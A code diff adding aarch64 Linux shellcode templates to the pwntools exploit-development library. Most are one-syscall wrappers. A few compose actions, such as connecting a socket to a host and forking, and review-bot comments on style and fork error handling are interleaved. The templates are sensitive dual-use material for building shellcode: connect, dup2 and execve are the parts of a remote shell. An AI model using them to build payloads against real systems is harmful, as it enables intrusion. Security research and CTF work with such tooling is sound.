diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clock_getres.asm b/pwnlib/shellcraft/templates/aarch64/linux/clock_getres.asm new file mode 100644 index 000000000..c5146b204 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/aarch64/linux/clock_gettime.asm new file mode 100644 index 000000000..ea3d37edc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/aarch64/linux/clock_nanosleep.asm new file mode 100644 index 000000000..b67ab9dad --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clock_settime.asm b/pwnlib/shellcraft/templates/aarch64/linux/clock_settime.asm new file mode 100644 index 000000000..3d2e48d34 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/clone.asm b/pwnlib/shellcraft/templates/aarch64/linux/clone.asm new file mode 100644 index 000000000..496e12bad --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/close.asm b/pwnlib/shellcraft/templates/aarch64/linux/close.asm new file mode 100644 index 000000000..df9daec69 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/connect.asm b/pwnlib/shellcraft/templates/aarch64/linux/connect.asm new file mode 100644 index 000000000..4f47bd03e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/connect.asm 
@@ -0,0 +1,26 @@ +<% +from pwnlib.shellcraft.aarch64 import pushstr +from pwnlib.shellcraft.aarch64.linux import socket, syscall +from pwnlib.util.net import sockaddr +%> + +<%page args="host, port, network = 'ipv4'"/> +<%docstring> + Connects to the host on the specified port. + Network is either 'ipv4' or 'ipv6'. + Leaves the connected socket in x12. + +<% + sockaddr, addr_len, address_family = sockaddr(host, port, network) +%>\ + /* open new socket */ + ${socket(network)} + + /* Put socket into x12 */ + mov x12, x0 + + /* Create address structure on stack */ + ${pushstr(sockaddr, False)} + + /* Connect the socket */ + ${syscall('SYS_connect', 'x12', 'sp', addr_len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/creat.asm b/pwnlib/shellcraft/templates/aarch64/linux/creat.asm new file mode 100644 index 000000000..9c76a9e1f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/dup.asm b/pwnlib/shellcraft/templates/aarch64/linux/dup.asm new file mode 100644 index 000000000..27a8d6c76 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/dup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall dup. See 'man 2 dup' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_dup', fd)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/dup2.asm b/pwnlib/shellcraft/templates/aarch64/linux/dup2.asm new file mode 100644 index 000000000..1cbf70376 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/dup2.asm 
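Review bot: `sockaddr, addr_len, address_family = sockaddr(host, port, network)` rebinds the imported `sockaddr` helper to its own return value, so the name is a function on one line and a packed struct on the next, and `address_family` is never used. `addr, addr_len, _ = sockaddr(host, port, network)` with `${pushstr(addr, False)}` keeps the helper's name intact. The docstring could also list the arguments (`host`, `port`, `network`) in the Arguments style the sibling templates use.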
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/dup3.asm b/pwnlib/shellcraft/templates/aarch64/linux/dup3.asm new file mode 100644 index 000000000..4b75cebf4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/echo.asm b/pwnlib/shellcraft/templates/aarch64/linux/echo.asm new file mode 100644 index 000000000..8134eff6e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/echo.asm @@ -0,0 +1,14 @@ +<% from pwnlib.shellcraft import aarch64 %> +<%page args="string, sock = '1'"/> +<%docstring> +Writes a string to a file descriptor + +Example: + + >>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() + 'hello\n' + + + +${aarch64.pushstr(string, append_null = False)} +${aarch64.linux.write(sock, 'sp', len(string))} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_create.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_create.asm new file mode 100644 index 000000000..37d6c065b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} 
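Review bot: echo.asm defaults `sock` to the string `'1'` while cat.asm in the same directory defaults `fd=1` as an int; both end up in a syscall argument, but the inconsistent types make the templates harder to read together and `sock = 1` matches the sibling. The docstring also lacks an Arguments section naming `string` and `sock`; `string(str): bytes to write` and `sock(int): file descriptor to write to` would match the generated templates' format.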
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_create1.asm new file mode 100644 index 000000000..0ae24df5d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_ctl.asm new file mode 100644 index 000000000..08d334005 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_pwait.asm new file mode 100644 index 000000000..aebff74a2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_pwait.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/aarch64/linux/epoll_wait.asm new file mode 100644 index 000000000..e744a762a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/execve.asm b/pwnlib/shellcraft/templates/aarch64/linux/execve.asm new file mode 100644 index 000000000..b40262fdc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/execve.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path, argv, envp"/> +<%docstring> +Invokes the syscall execve. See 'man 2 execve' for more information. + +Arguments: + path(char): path + argv(char): argv + envp(char): envp + + + ${syscall('SYS_execve', path, argv, envp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/exit.asm b/pwnlib/shellcraft/templates/aarch64/linux/exit.asm new file mode 100644 index 000000000..72e870c22 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/exit.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall exit. See 'man 2 exit' for more information. + +Arguments: + status(int): status + + + ${syscall('SYS_exit', status)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/faccessat.asm b/pwnlib/shellcraft/templates/aarch64/linux/faccessat.asm new file mode 100644 index 000000000..0951f75f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/faccessat.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fallocate.asm b/pwnlib/shellcraft/templates/aarch64/linux/fallocate.asm new file mode 100644 index 000000000..61d00b19c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchdir.asm new file mode 100644 index 000000000..53481c54e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchmod.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchmod.asm new file mode 100644 index 000000000..f51b5364d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchmodat.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchmodat.asm new file mode 100644 index 000000000..569a076e4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchown.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchown.asm new file mode 100644 index 000000000..56259c4bc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fchownat.asm b/pwnlib/shellcraft/templates/aarch64/linux/fchownat.asm new file mode 100644 index 000000000..199a9ed87 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fcntl.asm b/pwnlib/shellcraft/templates/aarch64/linux/fcntl.asm new file mode 100644 index 000000000..759176121 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/aarch64/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fdatasync.asm b/pwnlib/shellcraft/templates/aarch64/linux/fdatasync.asm new file mode 100644 index 000000000..dfa0d2b50 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/flock.asm b/pwnlib/shellcraft/templates/aarch64/linux/flock.asm new file mode 100644 index 000000000..55125650d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fork.asm b/pwnlib/shellcraft/templates/aarch64/linux/fork.asm new file mode 100644 index 000000000..b005c5e32 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/forkexit.asm b/pwnlib/shellcraft/templates/aarch64/linux/forkexit.asm new file mode 100644 index 000000000..3746a77d2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/forkexit.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft.aarch64.linux import fork, exit +%> +<%page args=""/> +<%docstring> +Attempts to fork. If the fork is successful, the parent exits. + +<% +dont_exit = common.label('forkexit') +%> + ${fork()} + cmp x0, 1 + blt ${dont_exit} + ${exit(0)} +${dont_exit}: diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fstat.asm b/pwnlib/shellcraft/templates/aarch64/linux/fstat.asm new file mode 100644 index 000000000..1d1200b5d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fstat64.asm b/pwnlib/shellcraft/templates/aarch64/linux/fstat64.asm new file mode 100644 index 000000000..38849140a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fstatat64.asm b/pwnlib/shellcraft/templates/aarch64/linux/fstatat64.asm new file mode 100644 index 000000000..f633516f9 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fstatat64.asm 
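Review bot: The forkexit docstring says only that the parent exits on success; the body's `cmp x0, 1` / `blt ${dont_exit}` also sends a failed fork (negative x0, signed compare) down the same path as the child, so on error the current process just continues. Suggest adding `On failure (negative return value) execution continues in the current process.` to the docstring. Since this depends on `fork()`, and the generic AArch64 syscall table provides clone rather than fork, confirm that `SYS_fork` resolves in the aarch64 constants.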
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fsync.asm b/pwnlib/shellcraft/templates/aarch64/linux/fsync.asm new file mode 100644 index 000000000..15f84a708 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ftruncate.asm b/pwnlib/shellcraft/templates/aarch64/linux/ftruncate.asm new file mode 100644 index 000000000..84e1b384d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/aarch64/linux/ftruncate64.asm new file mode 100644 index 000000000..331158ed2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/futimesat.asm b/pwnlib/shellcraft/templates/aarch64/linux/futimesat.asm new file mode 100644 index 000000000..f9a15b1a8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getcwd.asm b/pwnlib/shellcraft/templates/aarch64/linux/getcwd.asm new file mode 100644 index 000000000..574769dc6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getegid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getegid.asm new file mode 100644 index 000000000..5351f2e8a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/geteuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/geteuid.asm new file mode 100644 index 000000000..1cb71111f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/geteuid.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getgid.asm new file mode 100644 index 000000000..c77c49396 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getgroups.asm b/pwnlib/shellcraft/templates/aarch64/linux/getgroups.asm new file mode 100644 index 000000000..0c8d95109 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getitimer.asm b/pwnlib/shellcraft/templates/aarch64/linux/getitimer.asm new file mode 100644 index 000000000..e4cabd8f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpeername.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpeername.asm new file mode 100644 index 000000000..2624bddf4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpgid.asm new file mode 100644 index 000000000..f0ecf8b11 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpgrp.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpgrp.asm new file mode 100644 index 000000000..c34220c28 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpid.asm new file mode 100644 index 000000000..6795b50f5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpid.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpmsg.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpmsg.asm new file mode 100644 index 000000000..67932f4d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getppid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getppid.asm new file mode 100644 index 000000000..05d246d76 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpriority.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpriority.asm new file mode 100644 index 